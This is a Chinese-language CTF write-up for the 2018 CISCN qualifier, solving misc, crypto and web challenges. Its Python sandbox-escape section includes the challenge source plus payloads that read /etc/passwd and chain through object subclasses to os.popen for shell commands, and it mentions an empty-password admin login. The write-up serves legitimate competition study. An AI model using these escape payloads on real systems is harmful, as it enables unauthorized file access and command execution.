2018CISCN初赛Writeup

这次国赛作为一个Web选手倍受打击，web需要pwn师傅，crypto需要反编译，misc需要内核分析，mong男落泪，以后要学习一下二进制知识了。写了几个自己做出来的题的writeup。

Misc

验证码[签到版]

开赛的时候以为是机器学习，尝试着随便点了点时间到了就拿到了flag，估计是出了非预期解。

picture

图片放入binwalk

提取出了97E4文件,文件内容是base64，解密。

开头是KP，后面有PK文件，是一个zip压缩包，用python提取。

import base64
input=open('97E4','r')
output=open('key.zip','wb')
key=input.read()
output.write(base64.b64decode(key))
input.close()
output.close()

将开头的KP修改为PK，打开压缩包，code文件有加密，注释里有提示。

网上找对应的报错信息，得到解压密码是integer division or modulo by zero

得到code，采用了uuencode，用linux解密得到flag。

run

这题是一个python的沙盒逃逸，题目要求getshell。

用类继承和全局变量方法可以直接读取文件。
print ().__class__.__bases__[0].__subclasses__()[40]("/etc/passwd").read()

这里碰巧读到了题目的源码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2018-04-09 23:30:58
# @Author  : Xu (you@example.org)
# @Link    : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict
from types import FunctionType

main  = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__

def delete_type():
    type_dict = get_dict(type)
    del type_dict['__bases__']
    del type_dict['__subclasses__']

def delete_func_code():
    func_dict = get_dict(FunctionType)
    del func_dict['func_code']

def safe_import(__import__,whiteList):
    def importer(name,globals={},locals={},fromlist=[],level=-1):
        if name in whiteList:
            return __import__(name,globals,locals,fromlist,level)
        else:
            print "HAHA,[%s]  has been banned~" % name
    return importer

class ReadOnly(dict):
    """docstring for ReadOnlu"""
    def __delitem__(self,keys):
        raise ValueError(":(")
    def pop(self,key,default=None):
        raise ValueError(":(")
    def popitem(self):
        raise ValueError(":(")
    def setdefault(self,key,value):
        raise ValueError(":(")
    def __setitem__(self,key,value):
        raise ValueError(":(")
    def __setattr__(self, name, value):
        raise ValueError(":(")
    def update(self,dict,**kwargs):
        raise ValueError(":(")

def builtins_clear():
    whiteList = "raw_input  SyntaxError   ValueError  NameError  Exception __import__".split(" ")
    for mod in __builtins__.__dict__.keys():
        if mod not in whiteList:
            del __builtins__.__dict__[mod]

def input_filter(string):
    ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
    for i in ban:
        if i in string.lower():
            print "{} has been banned!".format(i)
            return ""
    return string

# delete_type();
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins

del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
  ____
 |  _ \ _   _ _ __
 | |_) | | | | '_ \
 |  _ <| |_| | | | |
 |_| \_\\__,_|_| |_|


Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it !  D:"
    except SyntaxError,e:
        print "Noob! Synax Wrong! :("
    except Exception,e:
        print "unknow error,try again  :>"

这里过滤了ls，没法用func_globals，但是可以用__getattribute__('func_global' + 's')替代。在用popen函数getshell。

payload：print [].__class__.__base__.__subclasses__()[59].__init__.__getattribute__('func_global' + 's')['linecache'].__dict__['o'+'s'].__dict__['popen']('l'+'s /home/').read()

Crypto

oldstreamgame

类似于强网杯流密码的题目，明文在2^31~2^32之间，尝试用爆破的方式。

import base64

def lfsr(R,mask):
    output = (R << 1) & 0xffffffff
    i=(R&mask)&0xffffffff
    lastbit=0
    while i!=0:
        lastbit^=(i&1)
        i=i>>1
    output^=lastbit
    return (output,lastbit)
mask = 0b10100100000010000000100010010100
key=[]
f=open('./key','rb+')
for i in f.read():
    key.append(ord(i))
for R in range(pow(2,31),pow(2,32)):#2147483648~4294967296
    flag = True
    r = R
    print(R)
    for i in range(100):
        tmp = 0
        for j in range(8):
            (R, out) = lfsr(R, mask)
            tmp = (tmp << 1) ^ out
        if tmp != key[i]:
            flag = False
            break
    if flag:
        print(hex(r)[:])
        break

由于内存太小，分组进行爆破，跑了很久才得到flag。

flag_in_your_hand

查看js，找到关键代码。

function ck(s) {
    try {
        ic
    } catch (e) {
        return;
    }
    var a = [118, 104, 102, 120, 117, 108, 119, 124, 48, 123, 124, 105];
    if (s.length == a.length) {
        for (i = 0; i < s.length; i++) {
            if (a[i] - s.charCodeAt(i) != 3)
                return ic = false;
        }
        return ic = true;
    }
    return ic = false;
}

用脚本跑出s。

a = [118, 104, 102, 120, 117, 108, 119, 124, 48, 123, 124, 105]
s = ""
for i in a:
    s+=chr(i-3)
print s

提交到html得到flag

Web

easyweb

username为admin，密码置空即可登陆得到flag。